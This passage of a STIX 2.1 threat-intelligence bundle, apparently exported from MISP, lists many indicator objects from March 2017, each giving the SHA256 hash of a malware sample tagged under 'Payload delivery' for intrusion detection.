"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615b-4ca0-4ef4-a601-4cea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'eda0dfc38e7f32efe209902e653553a231de906b3a8894d31c3e39bd3a7e3a99']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615c-f08c-458a-8e1a-45cd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '567cce05449594ed622160b443e81fb9e38989d830749d9e8bb5853f73226d11']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615d-878c-4b50-8341-4ace950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '62b8b1c425bce735789ab19b7e520304d85005df418221eb0f9b242d9e671a45']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615e-6fb8-41d8-8683-4cae950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '03766d99a1d7551ac4056c121c017ae70443d50c152ec1b06249c891baed435a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615f-ab20-45e0-bee8-448d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615f-768c-46be-9dbd-4681950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6160-e690-490f-8764-428c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6161-cef4-41fc-8ae7-4926950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6162-3f54-4568-9e4c-4a89950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6163-ac48-45cd-b687-4989950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6164-6650-4431-b34a-44f3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6164-d070-4b6a-a9dd-4162950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62ef-9be8-4beb-acb8-4567950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f0-51c4-41d3-b87d-421f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f1-2db8-4ace-a9fa-4311950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f2-2690-4b36-8621-495d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f3-1b54-4419-a0c7-4e49950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f4-7f44-49d1-9958-43b5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f5-8b4c-4c00-bc3d-493f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f6-174c-48fa-93f6-4d03950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f7-1fa8-4424-bf05-437d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f8-43f4-4fcd-9c19-4dd1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62f9-e758-4b0e-9aac-4ff8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fa-014c-4ab3-aad3-4972950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fb-6524-4312-8d68-466f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fc-ccd4-4103-881d-483b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fc-6ac4-4498-b69f-4ed6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fd-3b00-49d0-a5de-433e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62fe-1840-4f50-849c-4a2a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db62ff-5e04-4373-892c-44f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6300-7df4-4455-ac4b-4dba950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6301-0ba8-4fa4-8571-4b10950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6302-6118-4c43-83c2-443f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
